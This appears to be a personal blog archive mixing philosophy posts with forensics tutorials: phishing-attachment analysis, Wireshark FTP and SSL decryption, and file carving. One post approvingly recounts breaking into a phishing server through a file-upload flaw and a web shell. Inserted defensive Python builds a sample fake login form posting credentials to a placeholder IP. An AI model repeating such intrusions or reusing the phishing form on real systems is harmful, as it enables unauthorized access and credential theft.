Wednesday, September 26, 2018

Philosophy of corruption

Hey there!

Today I am going to talk about my philosophy on a very important topic, that is corruption.

Day by day we see lot of people talking about corruption, expressing their distress on corruption.
But wait, what is corruption?
Can someone define what it is, in actuality?

Many people relate corruption to money. Some relate it to power, while some relate it to character.

Power!
In this scenario, a person often tries to misuse the power which was vested in him to do good. The reality is adverse. Have you ever thought why he does that?
Simple; because he can.
If a person has power, he feels invincible and keeps trying to check his power all the time, either to showcase it in front of his friends or other colleagues with an intent to gain their appreciation.

Corruption is not about money or power. It is about your hidden thoughts and intention.
Whether a person would be corrupt (given the chance of his getting power and money) can be easily identified.
For example, tell a man that you are going to pay him 10 lakhs, and ask him what he is going to do with that money. This, my friend, is a very good technique.

The other thing I often relate to is this game called "Grand Theft Auto". It's a very good game which allows you to do whatever you wanted to do in real life, like .
I play this game a lot. I used to crave buying super cars in the game. I earned a lot in that game to buy a super car, but still I would steal vehicles from other people. This doesn't end here. Once I took the car, the driver would run away and I too would run behind him and hit him. Some of them would run away after getting hit, but some of them would fight back. When they fought back I would hit them and eventually kill them. Why? Just because nobody could kill me and I was literally invincible in the game? ..but that didn't make me a better person; I used to hit random people for 'fun'. When we see such things in real life, we may think how could a person be this insane, but when it comes to us (at least in a game) where we are invincible, we hurt people for fun?

A similitude has been coined.

Wednesday, August 9, 2017

Phishing in a well

I received an official mail asking me to confirm whether a mail they had received was a legitimate one or something suspicious.
The e-mail had a reply-to address of update@ingvysyabank.co.in

The domain ingvysyabank.co.in is a genuine domain registered by ING Vysya Bank but is not active.
[Note: Click on Images to enlarge] 

Now, I had to check if the e-mail ID really exists.

Without further ado, I started looking into the mail, and it also had an attachment.

I downloaded the attachment (an HTML file) and opened it in the web browser. It was a (fake) login page of ING Vysya Bank with a form asking for user credentials. I wanted to know where the data would be submitted when a user clicked the 'Submit' button, so I entered random details and clicked the 'Submit' button. I could see in the status bar of my browser that the data was going to some IP 207.210.xx.xxx, and then it redirected us to the genuine website of ING Vysya Bank.

So far so good. I just wanted to check if the page was working as it was meant to.


The next step was to view the source code of the HTML page to find where exactly the data was going on the click of the 'Submit' button.

The source code was obfuscated using the encodeURI() function of JavaScript and was decoded at run-time. The source code was Greek to me because of the obfuscation. I had to somehow decode the content to view the source code in clear text. I came to know about the decodeURI() function, which was the need of the hour. I used this technique to decode the source code into clear text. The data was double-encoded, so I had to double-decode the content using the unescape() or decodeURI() function to get the clear text, which I finally got after some time.

Now I knew what exactly I needed to look for in the source code. It was the "<form action>" tag, which along with the request method "POST" would submit the data to some host.

It was some "http://207.210.xx.xxx/~camion/remax/yes/is_vector.php".
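The decode-and-inspect step above can be done without ever rendering the attachment in a browser. The following is an added example (not code from the original post): it finds the percent-encoded string literal handed to unescape()/decodeURI(), peels the encoding layer by layer (the post's double encoding takes two rounds), and parses the decoded HTML for every form's action and method. The sample attachment, the kit path "~kit/collect.php" and the 203.0.113.10 address are constructed for the demonstration and are not the values seen in the real mail.

```python
import re
import urllib.parse
from html.parser import HTMLParser

# Matches the string literal passed to unescape()/decodeURI()/decodeURIComponent();
# with nested calls such as unescape(unescape("...")) the innermost literal is found.
ENCODED_LITERAL = re.compile(
    r"(?:unescape|decodeURI(?:Component)?)\(\s*(['\"])(.*?)\1\s*\)", re.S)


class FormExtractor(HTMLParser):
    """Collect the action/method of every <form> in a page without rendering it."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            a = {k.lower(): v for k, v in attrs}
            self.forms.append({
                "action": a.get("action"),
                "method": (a.get("method") or "GET").upper(),
            })


def peel_percent_encoding(text, max_rounds=8):
    """Percent-decode until the text stops changing. A double-encoded page
    takes two rounds; the round count itself is a useful triage indicator."""
    rounds = 0
    while rounds < max_rounds:
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds


def analyse_attachment(html):
    """Static triage of an HTML attachment: decode any literal that would be
    written at run time, then list where each form submits. Nothing is executed."""
    findings = []
    for _quote, literal in ENCODED_LITERAL.findall(html):
        decoded, rounds = peel_percent_encoding(literal)
        parser = FormExtractor()
        parser.feed(decoded)
        for form in parser.forms:
            findings.append({**form, "encoding_rounds": rounds})
    # Forms present in clear text (no loader) are reported as well.
    parser = FormExtractor()
    parser.feed(html)
    for form in parser.forms:
        findings.append({**form, "encoding_rounds": 0})
    return findings


# Constructed sample: a fake login form, double percent-encoded and wrapped in the
# kind of document.write(unescape(...)) loader the post describes. The collection
# URL uses a documentation-only address (203.0.113.0/24), not the real one.
_INNER = ('<html><body><form method="POST" action="http://203.0.113.10/~kit/collect.php">'
          'Customer ID <input name="uid"> Password <input name="pwd" type="password">'
          '<input type="submit" value="Submit"></form></body></html>')
_ONCE = urllib.parse.quote(_INNER, safe="")
_TWICE = urllib.parse.quote(_ONCE, safe="")
SAMPLE_ATTACHMENT = (
    '<html><head><title>Secure Login</title></head><body>'
    f'<script>document.write(unescape(unescape("{_TWICE}")))</script>'
    '</body></html>')


if __name__ == "__main__":
    for f in analyse_attachment(SAMPLE_ATTACHMENT):
        print(f"{f['method']} -> {f['action']} (decoded {f['encoding_rounds']} times)")
```

Running it on the constructed attachment reports one POST form whose action is the collection URL, recovered after two decoding rounds. JavaScript's unescape() also accepts %uXXXX sequences, which urllib.parse.unquote does not; a kit using those would need that extra form handled before the same approach applies.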

Great! Now we know where our data is going.
By the way, you already know that we cannot view the (actual) source code of a PHP file, right?
It is pre-processed on the server before the page is displayed. So, we can view only the code of the displayed page, but not the code which created the output.

So, now our aim was to see the code of this file "is_vector.php". I did some directory traversals to browse through various directories, and found a "file upload" vulnerability in some page there, and that's where I fired my favorite madspot shell, and we had access to all the files in that directory and all other sub-directories.

It took some time to find out which directory had the juicy information relevant to this case.
Okay, but first I was interested in identifying the last accessed IP from the access logs, and it was 41.206.15.41.
A quick WHOIS lookup gave the information that the IP belongs to Nigeria. (It could be a proxy or might be used for RDP, but anyway that's not what we want to find out, at least in this case.)

Now moving on to view the actual source code of the PHP file "is_vector.php", I traversed through the path to reach the file, viewed the source code and found that the data was being mailed to three IDs, namely cyber_crime52@yahoo.com, mrlogin801@gmail.com, and johncooperesq@live.com

To know the potential victims of this attack, I would have to hack (get) into the above accounts and check their inboxes for the details they have received.

Luckily, I believe somebody amongst them was insecure and had also added code at the end of that PHP file which would append the data to a text file in some directory there, along with sending the data via their mailer to the above mail IDs.

The mailer was found to be configured by some Heru Kusnadi (heru.kusna@gmail.com) who might be the main person behind this, or could just be another partner in crime.

Uhm, anyway, after deep-walking through those dozens of directories, I finally got the data related to the dump of credentials already submitted by some potential victims.


As I was not directly concerned with the victims outside India, I was looking for data related to Indians. I could find a dozen valid responses (proper credentials) and, fortunately or unfortunately, they had also filled in their genuine mobile numbers. It was easier for the team to contact them and inform them to change their credentials (ATM PIN, transaction password, email password, etc.).

By the grace of the Almighty, there was no loss to any of our potential victims and they had changed their credentials. They thanked us for the timely help and some of them also burst into tears, but this was out of happiness, as some victims had recently transferred their entire savings into this one account of theirs.

What did I get in return? Happiness in their voices, and a feeling of contentment both individually and also towards the Department, which they now trust.
Well, that is more than enough! :)
There was no official complaint as-such but sometimes we take the action like 'Minority Report' ;)

Anyway, if you feel anything is suspicious (as in mails, lottery SMSes, etc.) kindly report it to your local Cyber Cells via mail at least, and also do not hesitate to contact me at itsmerif[at]TheLogicalKid.in

The complete documentation including the "Technical Process" can be provided if you want to study the details. Shoot me a mail.

See you soon.

Greetz to The CliQue - Guy244, GSM50, SajjutXt, Nazim_KANK, F-roZ, i-maD

Regards,
itsmeRiF
The Logical Kid

Disclaimer: Specifically added the mail IDs of the suspects in a searchable method so that it can be indexed on Google when you doubt their mails and search for their e-mail IDs. I hope this post gets displayed in the search results.

Tuesday, August 1, 2017

Happiness - within and around (extended)

Hello! Long time no see, right? Hehe, I was busy with a couple of tours around the Indian Sub-continent. :D

Well, this post is non-technical and more of a philosophical sort, as I have been traveling a lot.. and maybe that is when you keep thinking about such stuff, when you gaze over the open skies! :D
This post is neither intended to brainwash you, nor to dominate your mind with my thoughts.
It is just my sole experience, and I hope that you may agree with all or at least some of my thoughts here.
Sometimes you feel that being rich is the only way of being happy, and for that you work all your life to earn that MONEY which you apparently think you need to be happy.
Don't you think you get many moments of happiness during this journey of yours of getting rich?
Uhm, let me create a scenario according to your logic of staying happy(ier,iest).

Assume that you want to buy your dream car and that it costs around 30 lakhs (Hey.. let's be practical here, and let's ignore your unrealistic range of cars worth crores, in this scenario).
So now, you have 30 lakhs, and you are good to go with your dream car.
Next what?
You would still have dilemmatic thoughts as to whether to buy the car with all the 30 lakhs you have, or settle for something of lesser cost and save the remaining money!

If you reluctantly go for the 1st choice and buy the car with all the money you have, what about the cost to be incurred on the car again? Fuel, servicing, oh yea.. a good garage for the car?
Now you start thinking about switching to 'ALL Brand' level, meaning "Everything of a HIGH market value, or standard", and you crave a good audio system in the car, renovating your place to match the standard of your car.
The point is, you are NOT enjoying the presence of your car and are thinking about the other things now.
You are even planning to arrange for a good garage for your car, the audio system, racing decals, and what not!
Let's assume that you had your car all set up with the latest audio system and all that seem-to-be-good stuff, somehow, through your salary, etc.. will you be happy now?
If you think that you will be happy, that's great! Sadly, reality is not that way. You will crave a better car sooner or later.. but for sure.
Statistically, you will be happy for a month, or a couple of them.. and get USED to the comfort and will seek better comfort or a HIGHER standard.
This is a continual process and it keeps on repeating until and unless your desires are controlled.


Here comes an incident of my life, wherein I realised another fact about happiness.
This happened when I was in my 4th standard.
My parents had come to my school to take some documents pertaining to the application for my Passport, and it was all BROADCASTED in my class by my class teacher that I was going to Saudi Arabia and my passport application was being filed.
Everybody was 'all smiles' in my class and suddenly I felt RICH! It was unexpected for me, who had never left Hyderabad until then and now was going out of the country. :D
This doesn't end here. Everybody at home also made me feel the same, and I was really very happy and tried behaving in the best manner (something of that sort) and all that drama.
I don't remember when this thought of me going to Saudi Arabia disappeared from my mind, until my 9th class when I actually went to Saudi Arabia for the first time.
What does this mean now? I hadn't been to Saudi in my 4th standard itself, but the thought itself made me happy, and I already felt as if I was there.
A survey also says that people are a lot happier planning their vacation than going on the vacation itself.
The above survey makes my point stronger now, ain't it? ;)

Uhm, I just remembered an incident in my life, which I consider an important event in my life.
I was in my 9th standard and had gone to Saudi Arabia for a vacation.
In the earlier days there, I used to go shopping with my papa and was limited to buying a few items (yea.. because my frequency of shopping was more :P).
I used to grab all that was wanted by me. :P

Then came a day when my papa told me, "Take WHATEVER you want today!"
What next? Theoretically, if anyone tells you so.. you never waste this chance and bump into all nooks and corners of the mall and grab everything you ever wanted to buy.. but on the contrary I was PUZZLED as to WHAT I NEEDED and WHAT TO BUY, as I had the freedom to buy everything I wanted that day.
No! I wasn't getting emotional, nor did I even think of the prices, no.. nothing! I was a 14 year old kid and was like every other kid who craves toys and all that fancy shopping!
Then came the enlightenment! I realised that only the words of my papa, which literally meant that he could buy ANYTHING for me, were more than enough for me.. and equivalent to that ANYTHING.
Since that day I had a change of mind and realised that happiness is NOT in BUYING things; it is basically in thinking that YOU can buy them.

Now, let's assume a different scenario, directly related to MONEY.
During my years of Graduation, my group CliQue had planned a party at the end of Graduation, and we thought of a contribution of 5000 Indian Rupees from each one in the group, which would be 35k in total, and planned to spend it lavishly at the Taj Hotel.
We would receive a scholarship from the Government, and so thought we would start saving that for the party.
After completion of our Graduation, though we had a lot more than the planned money, we were satisfied with having "paratha with aaloo" in a local restaurant and tea, roughly amounting to 500 Rupees max.


Let me imagine what would happen if someone really thought of spending all that 35k.
I bet they wouldn't, well at least according to me, who has lived that moment.

    
Let's consider that you really feel that you WILL spend that money no matter what, and without any second thoughts..
Okay! You spent all that without a second thought.. had a gala time for an hour, a couple of hours, or say 1 day..!
Obviously! You would have enjoyed a lot and yeah.. it would obviously have made you HAPPY too.. but what were the elements of happiness basically there? Your money?

Obviously NO! If money would make you happy, you wouldn't spend it at all! :)
You were happy because you probably weren't ALONE. You were sharing the enjoyable moments with the people you LIKE, LOVE, or CARE for.
So basically YOUR happiness was NOT from your money, but from the HAPPINESS of the people you were with.
So, the gist of this post is that real happiness is in the happiness of the people who matter to you.
Keep spreading happiness, you will never regret this! :)
Hope this post did leave some impact on you!

I firmly believe that what can be bought, can eventually be bought. After all, it requires only money, which can be earned someday. Don't worry about that. Worry about the things which cannot be 'bought'.

Having said that, time for me to wrap it up.

Thanks for reading. Take care! :)

Regards,
itsmeRiF


Monday, June 19, 2017

Modern Art - The Costliest one

Hey!

I started learning to paint as this is a recession-proof business and the older it gets, the more vintage value it has.

Here is an attempt to paint one of the costliest pieces of Art.


The above piece of Art was sold for a whopping $ 43,800,000 USD

Well, I tried re-creating the same as a back-up plan for when the Government fires me from my job.

Don't you think I have created it close enough?
If you want to buy, kindly contact me at itsmerif[at]thelogicalkid.in


Only one piece remaining, as I spent weeks and weeks making one piece using Microsoft Paint, a mouse by Dell, and an Asus machine which had the capacity for creating Rainbow Tables, but I preferred making this.

Bid starts from $ 438 USD (~0.00001 % of the Real worth)

Thursday, June 9, 2016

Analysing FTP traffic using Wireshark - The Logical Kid

Hello! I am back with a new post, and this one deals with the analysis of FTP traffic using Wireshark.
We will be dealing with the identification of data sent/received over FTP and the retrieval of files (if any were downloaded/uploaded).


Pre-requisites:
* Wireshark
* a PCAP file which may have FTP traffic captured. I have got my own, and if you do not have one, you can download it from here.

Note: Click on the images to enlarge

Let's begin!
1. Open the pcap file in Wireshark.

2. To find out if there is any FTP traffic in it, just apply the filter 'ftp' in the display filter.

3. Now when you see FTP traffic, find out if any data was downloaded by a user. To find out, just apply the display filter ftp.request.command=="RETR"

4. You can see a retrieve (RETR) request in a few frames; let us look at frame number 767, which was the first instance.

5. Now clear the filters and scroll up to a couple of packets before frame 767. If you look at frame number 762, the "Info" column gives some information. If you click on the "packet details" pane and on "File Transfer Protocol (FTP)" as shown in the picture below, you will find a field called "passive port". Note down the port number in that field and also the source IP address of the same frame.

We found that the IP address is 149.20.20.135 and the port number is 30893.

6. Now we need to find any activity to/from the IP address 149.20.20.135 over port 30893.
To achieve this, apply the following filter in Wireshark: ip.src==149.20.20.135 and tcp.port==30893
We get the following output.

7. What next? Observe frame number 765: we can see some activity over port 30893 from the source IP 149.20.20.135. Let's "Follow TCP stream".

8.  Select the data from the source (149.20.20.135) to the destination.

9. In step 3 we saw that the user had requested the download of a .rpm file, so let us assume it to be the same for the time being. Let us save the stream content as "something.rpm".

That's it! Your work is done (well, almost). Now do not try executing the file yourself directly, as we are not sure about its nature; it can be malware too. Anyway, you can try executing it in a sandbox environment isolated from the network, just in case you are curious to know.
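The manual correlation in steps 5 to 9 (passive-mode reply, then the RETR that follows it, then the data stream on that port) is mechanical enough to script. The block below is an added example, not code from the original post or from Wireshark: it walks a control-channel exchange, converts each PASV reply's (h1,h2,h3,h4,p1,p2) into an address and port (p1*256+p2, which is how 120,173 becomes the post's 30893), pairs it with the next RETR/STOR, emits the same Wireshark display filter the post uses, and then checks the first bytes of the reassembled data stream against known file signatures so that the "assume it is an .rpm" step in step 9 is verified rather than assumed. The control-channel lines, the file name "something.rpm" and the data-stream bytes are constructed for the demonstration; it also handles the EPSV (229) reply, which the post does not show.

```python
import re

# PASV reply: "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)"
# EPSV reply: "229 Entering Extended Passive Mode (|||port|)"
PASV_RE = re.compile(r"^227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
EPSV_RE = re.compile(r"^229 .*?\(\|\|\|(\d+)\|\)")
XFER_RE = re.compile(r"^(RETR|STOR)\s+(.+?)\s*$")

# A few well-known file signatures used to verify what the data stream really is.
MAGIC = {
    b"\xed\xab\xee\xdb": "rpm",   # RPM package lead
    b"\x1f\x8b": "gz",            # gzip
    b"PK\x03\x04": "zip",         # zip / jar / docx
    b"\x7fELF": "elf",            # Linux executable
    b"\xff\xd8\xff": "jpg",       # JPEG
}


def parse_passive_reply(line, server_ip):
    """Turn a 227/229 reply into the (ip, port) of the upcoming data connection, or None."""
    m = PASV_RE.match(line)
    if m:
        h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
        # PASV encodes the port as two bytes: high * 256 + low
        return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2
    m = EPSV_RE.match(line)
    if m:
        # EPSV gives only the port; the address is the control channel's server
        return server_ip, int(m.group(1))
    return None


def correlate_transfers(control_lines, server_ip):
    """Walk the control channel in order and pair each RETR/STOR with the passive
    endpoint announced just before it. Each record carries the Wireshark display
    filter that isolates that data stream."""
    transfers = []
    pending = None
    for direction, line in control_lines:
        if direction == "S":
            endpoint = parse_passive_reply(line, server_ip)
            if endpoint:
                pending = endpoint
        elif direction == "C":
            m = XFER_RE.match(line)
            if m and pending:
                ip, port = pending
                transfers.append({
                    "command": m.group(1),
                    "filename": m.group(2),
                    "data_ip": ip,
                    "data_port": port,
                    "wireshark_filter": f"ip.src=={ip} and tcp.port=={port}",
                })
                pending = None  # a passive endpoint serves exactly one transfer
    return transfers


def identify_stream(data):
    """Match the first bytes of a reassembled data stream against known signatures,
    so the saved file is named by what it is, not by what the RETR command claimed."""
    for signature, kind in MAGIC.items():
        if data.startswith(signature):
            return kind
    return "unknown"


# Constructed control-channel exchange (S = server reply, C = client command),
# using the server address and passive port that appear in the post.
CONTROL = [
    ("S", "220 (vsFTPd 3.0.2)"),
    ("C", "USER anonymous"),
    ("S", "331 Please specify the password."),
    ("C", "PASS user@example.com"),
    ("S", "230 Login successful."),
    ("C", "TYPE I"),
    ("S", "200 Switching to Binary mode."),
    ("C", "PASV"),
    ("S", "227 Entering Passive Mode (149,20,20,135,120,173)."),
    ("C", "RETR something.rpm"),
    ("S", "150 Opening BINARY mode data connection for something.rpm (4096 bytes)."),
    ("S", "226 Transfer complete."),
]

# Constructed stand-in for the bytes recovered with "Follow TCP stream":
# an RPM lead magic followed by filler.
DATA_STREAM = b"\xed\xab\xee\xdb\x03\x00\x00\x00" + b"\x00" * 24


if __name__ == "__main__":
    for t in correlate_transfers(CONTROL, "149.20.20.135"):
        print(t["command"], t["filename"], "->", t["wireshark_filter"])
    print("stream looks like:", identify_stream(DATA_STREAM))
```

The signature check is the safe part of triage: it tells you whether the saved stream is the package the RETR claimed, a different file type, or something unknown, without ever opening or executing it. Active-mode transfers (a PORT command from the client instead of a PASV reply from the server) put the endpoint in the client's command, so the same pairing logic would need to read the "C" side for those.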

Hope this was informative and I didn't waste either of our time.

Will be back soon with a new post.
Until then, keep reading and keep spreading the word.

Regards,
itsmeRiF
The Logical Kid

Monday, March 21, 2016

The Power of Social Media in dealing with day-to-day problems! - The Logical Kid

Hello! A warm welcome to the blog once again. Today I am going to talk neither about Technology nor about Philosophy, but about something which is relevant nonetheless.

My last post was about Social media where I had focused on detecting fake content which was spreading virally over various social (media) platforms.

This post is about my personal experience in dealing with one of many daily problems solved using social media.

tl;dr (long story short) I was conned by two petrol pump employees, and then action was taken on them by the concerned department, thanks to the power of social media.


This starts with the day I happened to re-fuel my bike at a Petrol Station at Barkatpura, Hyderabad. I was always suspicious about this place, but as this station was the first one on my way to office I often used to re-fuel my bike here.

The modus operandi of those people was as follows:
When a person asked for a re-fuel, the pump operator would stand in front of the meter, apparently to block the meter reading, and the other (the cashier) would stand opposite the operator. As the re-fueling process started, the cashier would wait for some time and distract the customer by asking him to re-fill air in his vehicle, and as soon as the person got distracted and took his eyes off the meter, the operator would stop filling, reset the meter and claim that he had completed filling.

One morning, as usual, I went to this petrol station and asked the operator to fill petrol for 100 Rupees. I (with the suspicion in mind) started staring at the meter with full concentration, but somehow the cashier distracted me by shaking my bike and telling me to fill air. After that I turned back to see it was reading '70' on the meter, and I told the operator to fill the remaining 30, and whoosh! The meter was suddenly reset to '0' and the operator told me "It was 100 and not 70", and I (feeling angry and helpless at the same time) had no evidence to prove my point as the meter was already reset.

I moved on, and reached the office thinking I would be careful from next time, but this guilt of a loss of 30 Rupees per 100 Rupees was bothering me and I didn't want this to happen to anybody else. I had to do something about this.
I had a couple of things in my mind: First, I had not taken any bill that I could relate to my transaction. Second, there was no CCTV installed in the premises of that station, at least not around the pump.

I discussed this with a colleague at the office and he explained to me how, for every transaction at the pump, logs are generated which contain the amount for which petrol was filled in every session, with date and time stamps.

Then came an idea. We have heard a lot about good governance using social media, now it was time to put it to litmus test. I searched for the complaints board on the official site of HP, found their complaints section and posted my complaint there.

I wasn't satisfied because the complaint section was limited to just about 200 characters and I couldn't elaborate everything.
So, I found out the official handle of Hindustan Petroleum on Twitter and tweeted them my complaint to see if I could bring it into their notice as early as possible.

To my surprise, I received a reply within 15 minutes from their Twitter handle.

I e-mailed them the details at the above mentioned e-mail ID.

I then sat back and waited to get an update from the concerned department.
After 5 days from the date of reporting, I received a call from the Deputy Manager (Vigilance) of HP for Hyderabad, and she asked me to elaborate on the incident and also informed me that those (two) employees were proven guilty and were fired. The Manager had also apologized for the inconvenience.

Response time: 5 days


Believe in the power of Social Media. Use it for the good. Things take time to get sorted, but give it a try.
That's all folks!
This post was to show how Social Media can be put to use to deal with our real life problems and not only for dealing with candy crush requests.

I rest my case.
If you have any queries, you can simply comment below, or can mail me at itsmerif[at]thelogicalkid.in

See you soon with a new post!

Regards,
itsmeRiF
The Logical Kid

Monday, February 1, 2016

Social media Analysis - Dealing with content posing 'forced' negativity & How to be a myth buster. - The Logical Kid

Lately, there have been so many posts circulating over different social networks which do nothing for the betterment of anyone, but can be used to create disturbance in communal harmony.

In this era where people debate over Religions with statements like "My religion is superior to yours" and/or something like "Your religion is the cause of terrorism", etc., people have started using social media as a force multiplier in creating hatred among various communities for reasons best known to them, because obviously there is nothing good in fighting to prove that so-and-so religion is better. If it's better, then you don't need to shout, and by the way, if it's better, then first you should follow it sincerely instead of imposing it on others.

My interest, or a 'part' of my work, includes keeping an eye on 'potential' hate-mongering people. I follow the posts they make, try to verify the authenticity and detect "caption spoofing" (if done), and then read and try to understand the comments people make on their posts (mostly in favor of them) and try to analyse the 'sentiments' which made them vulnerable to believing whatever is posted by the people they follow.

We do not need to worry about the people who talk 'positive', or at least share the content which is true. The problem is with the people who share anything which they know can create controversy over social media, and they themselves (mostly) do not know whether the content is authentic.

Let me take an example:

While I was browsing through my Facebook news feed, I happened to come across a page which was sharing some content with a 'negative' sentiment attached to it, which could disturb the harmony between some communities.

While the post was just gaining momentum as people started sharing this content, my focus was on verifying the authenticity of this post.

Firstly, I downloaded the photo and checked if it was morphed / doctored.
By using tools for 'image based search', we could somehow assume that it wasn't morphed, but had been touched up using some filters to increase the contrast.
As a supporting document for my assumption, I have added the original picture for reference below:

As seen here, the upper part contains the original picture, and the lower part contains the same picture on which some filters have been applied.

Now coming to the story behind the picture.
Well, for this there are many tools over the internet, but I somehow prefer using Tineye and/or Google's own image based search tool.

The logic for deciding which picture is authentic is sometimes simply looking at the date it was posted. The older it is, the greater the chance of it being legitimate.
Anyway, there is much more to it besides this (the date), which helps us ascertain the facts.

After searching over a couple of archives where the photo was posted, I could find a website where this content was posted much before it was posted on the other sites.
I gave it a thorough read, and could be sure that this photo was taken somewhere in Thailand.

On further lookup, I found a video which was aired on a News channel, which could be used for further supporting our assumption.

I rest my case.

- Arif Ali Khan (itsmeRiF)

Wednesday, January 27, 2016

Decrypting SSL traffic using Wireshark! - The Logical Kid

Hello, all!

Like me, you as well might have heard quite often that the Government is able to 'read' all our 'secure' traffic too, and that they do it by using some secret keys, or so. Did you hear the same?

Well, whether you have heard it or not, that's the way they do it! ;)

Now, to understand how they do it, curiosity led me to some good forums over the internet where they explained how it is done.

First things first. To make this happen, the Government needs to have the decryption key, probably the private key.
We will emulate the same here.
Things we require:

1. SSL Traffic dump
2. Decryption key (private key)
3. Wireshark (used Version 2.0.0rc3)

Patience, people! I will provide the link for sample SSL traffic dump and all that is required for this task after I explain; somewhere down the lane.:)


1. Run Wireshark, and open the sample SSL traffic dump file.

The data gets loaded.

So far so good, but then you can see some (encrypted stuff) Greek or Latin as we casually refer to something of that sort. Let me presume that none of us know either of these. ;)

In the above picture you can see (under data) that the data is encrypted.
So, what next?

2. Click on Edit -> Preferences -> Protocols -> SSL and click on 'Edit' beside "RSA keys list" as follows:

3. Click on "+" and fill the fields IP Address, Port, protocol with 127.0.0.1, 443 and http respectively.

4. Now double click on the 'Key file' parameter and browse and select the private key file.

That's it!

You will see some extra panes in the window, as follows:


You can see that the SSL traffic was decrypted and displayed in clear HTTP.

Let's compare a couple of frames as to how they looked when encrypted, and also after decryption.

Simple, right?
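One check worth doing before going through steps 2 to 4: the RSA-keys-list method only works when the connection negotiated a cipher suite with RSA key exchange, because that is the only case where the client sends the premaster secret encrypted to the server's public key. With (EC)DHE suites or TLS 1.3 the session keys are derived from ephemeral values, so the server's private key does not decrypt anything (for those, Wireshark's "(Pre)-Master-Secret log filename" preference, fed from a key log written by the client, is the route). The block below is an added example, not Wireshark's code or the post's: it builds a minimal ServerHello record, parses the cipher suite the server chose, and reports whether a private key would suffice. The cipher-suite table is a small subset chosen for the demonstration, and the records are constructed rather than taken from the post's capture.

```python
import struct

# A handful of IANA cipher-suite codes grouped by key-exchange method
# (a subset for the demonstration, not the whole registry).
CIPHER_SUITES = {
    0x002F: ("TLS_RSA_WITH_AES_128_CBC_SHA", "RSA"),
    0x0035: ("TLS_RSA_WITH_AES_256_CBC_SHA", "RSA"),
    0x009C: ("TLS_RSA_WITH_AES_128_GCM_SHA256", "RSA"),
    0x0033: ("TLS_DHE_RSA_WITH_AES_128_CBC_SHA", "DHE"),
    0xC013: ("TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA", "ECDHE"),
    0xC02F: ("TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", "ECDHE"),
    0xC02B: ("TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256", "ECDHE"),
    0x1301: ("TLS_AES_128_GCM_SHA256", "TLS 1.3"),
}

HANDSHAKE_RECORD = 0x16
SERVER_HELLO = 0x02


def build_server_hello(cipher_suite, version=b"\x03\x03", session_id=b""):
    """Construct a minimal ServerHello inside a TLS record (sample input only)."""
    body = (version + bytes(32)                       # legacy version + 32-byte random
            + bytes([len(session_id)]) + session_id    # session id
            + struct.pack(">H", cipher_suite)          # the selected cipher suite
            + b"\x00")                                 # compression method: null
    handshake = bytes([SERVER_HELLO]) + len(body).to_bytes(3, "big") + body
    return (bytes([HANDSHAKE_RECORD]) + version
            + struct.pack(">H", len(handshake)) + handshake)


def parse_server_hello_cipher(record):
    """Return the cipher-suite code chosen by the server, from a TLS handshake record."""
    if len(record) < 5 or record[0] != HANDSHAKE_RECORD:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack(">H", record[3:5])[0]
    handshake = record[5:5 + rec_len]
    if len(handshake) < 4 or handshake[0] != SERVER_HELLO:
        raise ValueError("record does not carry a ServerHello")
    body_len = int.from_bytes(handshake[1:4], "big")
    body = handshake[4:4 + body_len]
    # body layout: version(2) random(32) session_id_len(1) session_id cipher_suite(2) ...
    session_id_len = body[34]
    offset = 35 + session_id_len
    return struct.unpack(">H", body[offset:offset + 2])[0]


def server_key_decrypts(record):
    """Decide whether the server's RSA private key alone can recover the session
    keys. Only RSA key exchange sends the premaster secret encrypted to that key;
    (EC)DHE and TLS 1.3 derive it from ephemeral values the key never touches."""
    code = parse_server_hello_cipher(record)
    name, kx = CIPHER_SUITES.get(code, (f"unknown(0x{code:04x})", "unknown"))
    return {"cipher_suite": name, "key_exchange": kx, "private_key_suffices": kx == "RSA"}


if __name__ == "__main__":
    for code in (0x002F, 0xC02F, 0x1301):
        print(server_key_decrypts(build_server_hello(code)))
```

In a real capture the ServerHello is the handshake record the server sends right after the ClientHello; the bytes of that record are what you would feed to server_key_decrypts. If it reports ECDHE, DHE or TLS 1.3, no amount of configuring the RSA keys list will turn the "encrypted stuff" into HTTP.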

This was also done for the test given on 'Pentester Academy' with respect to the module 'Decrypting SSL Traffic' in WAP Challenges. If you have enrolled for that course, this will help in solving it. :)

Uhm, now the stuff I used here can be downloaded from here.


Now whenever somebody says that Government is able to read all your 'secure' data sent to an xyz website, you now know that they probably have the private key used by that server. :)

That's all folks!
Kindly leave comments which may include suggestions, queries, and anything which can make this post effective in doing what it was meant to do.

Regards,
itsmeRiF
The Logical Kid  

Monday, December 28, 2015

File carving & Steganography explained! - The Logical Kid

File Carving


Note: the template was designed for Desktop browsers. Kindly excuse for the display in mobile browsers.


What is file carving?

File carving in literal terms, is the technique of extracting (juicy) files from a given block of (raw) data. This technique is practically used in Digital Forensics to extract important files like pictures, documents, excel sheets, etc.


Steganography

What is Steganography?

Steganography, in literal terms, is the technique of hiding data in data (say, another file), basically to evade surveillance as a matter of privacy.
Example: Hiding an image in an image. It's as simple as hiding your girlfriend's picture in your picture, and all anybody can see is your picture.


What we are going to deal with in this post?

At first, we are going to see the concept of manual File carving technique(s); then we move on to understand Steganography and practice it a bit; and later we apply the file carving technique to try and detect steganography and retrieve the forbidden information from the files to which steganography was applied.


Tools of the trade:
HxD – Hex editor
Obama & Osama – Don’t worry, I was talking just about the images. :)

..and let the games begin!


1. As I am dealing with Osama and Obama, let's download one picture each, of both.

2. Now let's use our Hex editor (I am using HxD) to open the file obama.jpg

Look at the first four bytes of data of the image.
Can you see FF D8 FF E0 in hex, or ÿØÿà in ASCII ?

These are called magic numbers or file signature.

A JPG basically has FF D8 FF E0 (or E1, E8) in the header and ends with FF D9 (ÿÙ in ASCII) in the trailer.


JPG File Signature


Now, if I try to rename obama.jpg to obama.mp3, let's see what happens.

As you can see, the extension change made the file be detected as an audio file by my default mp3 player.
Try playing it?

Obvious error right ? You cannot expect an image to play music for you! 

Let's re-open that changed mp3 file with HxD

